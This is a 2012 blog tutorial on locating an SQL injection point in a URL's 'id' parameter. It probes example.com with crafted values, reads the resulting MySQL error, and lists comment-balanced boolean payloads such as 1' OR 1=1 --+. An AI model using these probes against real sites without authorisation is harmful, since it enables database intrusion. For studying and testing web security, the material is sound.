Sunday, June 3, 2012

Finding Injection Parameter


Now that we saw some Basic SQL Injection to Fuzz the Admin Login Panel, We will now head towards understanding Parameters in an URL.

What is a Parameter?
It is a place where user inputs somethings, and the input is then used to build a Query and execute the Query.

Ex: A form in a webpage, will have parameters, because it allows the user to input some data, and according to the data entered, some Query will be build and executed.

Dynamic Links on a webpage, you might have seen Tabs on a webpage like GALLERY, NEWS, etc. when you click on it, it connects to a Table, like Table: 'category' etc.

Lets take an example here:

http://www.example.com/index.php?id=

Ok so when I have such kind of URL, the first thing comes to my mind is, based on the 'id' value, so sort of page shall be my expectation as output.

Now I start playing with it, keeping my eyes open

http://www.example.com/index.php?id=1

http://www.example.com/index.php?id=2

http://www.example.com/index.php?id=3

Okay, what am I noticing here, the 'id' numbers are Integers, based on which I get different webpages.

I continue...

http://www.example.com/index.php?id=CK

And i get a blank page with No MySQL errors, so I conclude, the id parameter accepts only 'integers'.

I continue...

http://www.example.com/index.php?id=CK1

http://www.example.com/index.php?id=1CK

And I still get Blank Page with no MySQL errors, I conclude, it cannot take AlphaNumeric Values.

I continue more...

http://www.example.com/index.php?id=9999999999999999999

And I still get Blank Page with no MySQL errors, I conclude, it cannot take Long Integers.

So what is it that I am trying to do? Nothing, Its known as Analyzing the work flow, or understanding the 2nd Layer Engine, that connects to Database.

Typically I am trying to break the normal functionality or Fuzzing it.

I continue...

http://www.example.com/index.php?id=1'

And Viola I broke It, I got an Error Of MySQL

(You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1)

So Here Is what I understand now,
parameter is 'id'
If Datatype int, No SQL Error
If Datatype string, No SQL Error
If Datatype long, No SQL Error
If Datatype aplhanumeric, No SQL Error
If Datatype Special Characters, SQL Error

Now Lets try to understand the Error we got,

We are not learning grammer or sentence structure here, so I dont care what it says, I am more concerned about the Error I got, ie: ''1'' LIMIT 0,1'

Analysing...

''1'' LIMIT 0,1' >> Every Parameter Is surrounded by quotes so lets eliminate the outermost quotes
'1'' LIMIT 0,1
'  1'  ' LIMIT 0,1
'  (User_input_values_here)  ' LIMIT 0,1
With a single quote, I unbalanced the Quotes, which gave out the error, so my Injection is a single Quote, Now Lets try to Balance it out. How? By commenting out, which tells the database that anything after the comment symbols are comments, so Database Ignores it.

Comments symbols are:
1. /*(comments)*/
2. --+(comments)
3. # (comments)

As The Prime Objective of This post is to Find Out Injecting Parameter and Fields, I will Stick To It, On Next Post I will Explain, How To Exploit it.

Again, I try:

http://www.example.com/index.php?id=1' # >> MySQL Error
http://www.example.com/index.php?id=1' /* >> MySQL Error
http://www.example.com/index.php?id=1' --+ >> No Error

So Now I Found out Where In I can inject SQL Queries. Any Valid SQL Query Between (1'  [here]  --+) will be executed as a valid SQL Query.

Just As an Example:

http://www.example.com/index.php?id=1' --+ >> No Error, With Valid Output
http://www.example.com/index.php?id=1' AND 1=2 --+ No Error, But No Output, Because Our Logic Given here is 1=2, which is always False
http://www.example.com/index.php?id=1' AND 1=1 --+ >> No Error, With Valid Output
http://www.example.com/index.php?id=1' OR 1=1 --+ >> No Error, With Valid Output
http://www.example.com/index.php?id=1' OR 1=2 --+ >> No Error, With Valid Output (We Get the Output Here, because our Query has an OR Operator, 1 OR 0 = 1, 1 OR 1 = 1, 0 OR 1 = 1, 0 OR 0 = 0)

This is a Simple Digital Computing Of 'OR' Operator.

So, we see that, we found out the Place where we can Inject our SQL Queries.

Hope This was Informative. and Helpful.

Thank You!

0 comments:

Post a Comment